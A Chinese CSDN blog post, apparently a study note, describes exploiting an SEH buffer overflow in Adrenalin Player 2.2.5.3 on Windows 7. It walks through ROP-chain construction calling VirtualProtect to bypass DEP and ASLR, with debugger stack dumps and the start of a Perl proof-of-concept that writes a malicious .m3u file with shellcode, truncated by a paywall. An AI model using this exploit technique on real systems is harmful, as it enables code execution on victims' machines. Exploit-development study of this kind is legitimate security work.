VirtualProtect 3方法 -seh ret-ASLR-dep-Adrenalin Player 2.2.5.3

最新推荐文章于 2022-11-16 19:58:05 发布
最新推荐文章于 2022-11-16 19:58:05 发布
阅读量1.1k 收藏
点赞数
分类专栏: 漏洞基础学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zcc1414/article/details/35912685
版权
本文介绍了在WIN7环境下,如何寻找无ASLR和DEP保护的DLL进行溢出攻击。通过特定指令搜索构造ROP链,并利用VirtualProtect函数改变内存页权限,实现从0012F208开始的可执行代码执行,最终成功创建POC。
摘要由CSDN通过智能技术生成

环境  :  WIN7    

寻找 无ASLR+DEP 的DLL 去溢出

!pvefindaddr rop 慢慢 搜  也可以 先搜索出 !pvefindaddr noaslr 才对指定

然后查找合适的东西 EG:  cat rop.txt | grep -I "ADD ESP,4" > 1.txt

因为是覆盖 SEH handler  所以 覆盖的 ROP小配件不是连续的,首先要先跳到 我们的字符串去

在反复进行测试时要注意 软件是不是运行后就卡住了,

这是因为它打开了上一次测试的文件,这时测试的数据有误

动态寻找 VirtualProtect 函数的地址,利用偏移去寻找~~~~~~~~~~~~~~

有时候 可以直接 二进制寻找 指令



堆栈 处于 不能执行状态


还有一个问题就是

0012F004   FFFFFFFF  |hProcess = FFFFFFFF
0012F008   0012F20C  |Address = 0012F20C
0012F00C   00000300  |Size = 300 (768.)
0012F010   00000040  |NewProtect = PAGE_EXECUTE_READWRITE
0012F014   1024BB98  \pOldProtect = Adrenali.1024BB98
我是 对 0012F20C 开始 设置 可执行的  但是我执行是从 0012F208 开始执行的,但还是可以执行的

0012F208    45              inc ebp
0012F209    45              inc ebp
0012F20A    45              inc ebp
0012F20B    45              inc ebp
0012F20C    45              inc ebp
0012F20D    45              inc ebp
0012F20E    45              inc ebp
0012F20F    45              inc ebp
0012F210    45              inc ebp



最后成功POC:

my $file = "1.m3u";#perl    
my $junk1="A"x24; #2176;

#esp start
my $shellcode = "TYIIIIIIIIIIIIIIII7QZj
最低0.47元/天 解锁文章
pandamac
关注
专栏目录
ssdt.rar_SSDT DELPHI_SSDT-hook delphi_Table_delphi ssdt_ssdt
09-22
在Delphi中实现SSDT挂钩,开发者通常需要深入理解Windows API,特别是与系统服务相关的函数,如`ZwQuerySystemInformation`来获取SSDT信息,以及可能用到的内存操作函数,如`VirtualProtect`来修改页面保护属性以便...
CTF 逆向题之 Bwarm
KingZhang2000的博客
09-11 1692
这个题本次攻防大赛的热身题,难度不算太大,坑就坑在是vmp壳,好吧今天把这个硬骨头啃了吧 : ) 首先,还是查壳,没啥说的 vmp2.0.7 根据vmp系列脱壳教程,这个壳是1.8以上的方案进行脱壳。先拖入OD,下一个API断点 VirtualProtect (教程建议是下硬件断点,可能是我的OD有问题,硬件断点断不下来,只能是F2断点了 T_T) 然后F9开始...
virtualProtect函数
weixin_34348111的博客
06-04 723
原文链接:https://blog.csdn.net/zacklin/article/details/7478118 结合逆向课件11 转载于:https://www.cnblogs.com/qy-blogs/p/9134114.html
VirtualProtect函数
热门推荐
zacklin的专栏
04-19 3万+
首先我们来看看MSDN上对VirtualProtect函数的说明。 BOOL VirtualProtect(    LPVOID lpAddress,    DWORD dwSize,    DWORD flNewProtect,    PDWORD lpflOldProtect  );   各参数的意义为: lpAddress,要改变属性的内存起始地址。 dwSize,要改变属性的内存区
ph-malhide:进程黑客 2 隐藏在外部应用程序中
06-02
- **C Hooks**: C语言实现的钩子技术,是编程中用于拦截和修改函数调用的一种方法,常用于调试、监控或者恶意软件中,以改变程序的行为。 - **WinAPI**: Windows API(Application Programming Interface),是微软...
Windows-API-.zip_windoes api教程
09-21
这个压缩包文件“Windows-API-.zip”显然包含了关于Windows API编程的基础教程,对于初学者或是想要深入理解Windows系统操作的开发者来说,这是一个宝贵的资源。 Windows API 提供了大量的函数、结构体、枚举类型等...
forgers-win32-tutorial.rar_win32 API编程
09-20
2. **内存管理**:`VirtualAlloc`、`VirtualFree`和`VirtualProtect`等函数用于动态分配和释放内存,以及改变内存保护属性。 3. **网络编程**:Winsock库提供了网络通信的功能,如`socket`、`bind`、`listen`、`...
apihook-dephi.rar_Delphi控件源码_Delphi_
08-12
3. **钩子函数**:这是API Hook的核心,它接收API调用时的参数,并根据需求进行操作。可能包括记录网络数据、分析函数行为或调用原始API函数。在这个项目中,由于描述提到可以获取socket网络数据,钩子函数可能特别...
2022CTF培训(一)脱壳技术&Hook入门
sky123博客
11-16 1787
绝大多数加壳程序会在被加密的程序中加上一个或多个段(Section),在最后跳转至 OEP 时一般都是通过一个跨段跳转指令进行转移,所以依据跨段的转移指令(JMP 等)就可找到真正的入口点,并且在该跳转指令前一般会有 POPAD / POPFD 指令出现(恢复入口现场)。在 x32dbg 中 Ctrl+B 搜索E9找到长跳转指令在该位置下断点后执行即可进入程序真正的入口点,此时程序已完成脱壳。使用 Scylla 将程序 dump 下来。
动态调用VirtualProtect去除IAT特征
R4bbit
02-18 1170
编译环境:windows 10 专业版 x64 vs2017 获取Kennel32基址: __declspec(naked) DWORD getKernel32() { __asm { mov eax, fs:[030h]; test eax, eax; js finished; mov eax, [eax + 0ch]; mov eax, [eax + 14h];...
高强度花指令--SEH
雪之梦的专栏
07-05 1303
反调试感觉作用很大,但是很难懂..所以教程都没有说...FS寄存器指向当前活动线程的TEB结构(线程结构)偏移  说明000  指向SEH链指针004  线程堆栈顶部008  线程堆栈底部00C  SubSystemTib010  FiberData014
分析以下代码作用 HMODULE v0; // eax FARPROC lpAddress; // [esp+50h] [ebp-8h] DWORD flOldProtect; // [esp+54h] [ebp-4h] BYREF v0 = GetModuleHandleA("kernel32.dll"); lpAddress = GetProcAddress(v0, "WriteFile"); VirtualProtect(lpAddress, 5u, 0x40u, &flOldProtect); memcpy(lpAddress, &unk_42DC8C, 5u); return VirtualProtect(lpAddress, 5u, flOldProtect, &flOldProtect);
最新发布
06-12
3. 使用 VirtualProtect 函数修改 lpAddress 所指向的内存区域的访问权限为可写可执行,并将原来的访问权限保存在 flOldProtect 变量中。 4. 使用 memcpy 函数将 unk_42DC8C 函数的前五个字节复制到 lpAddress 所...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值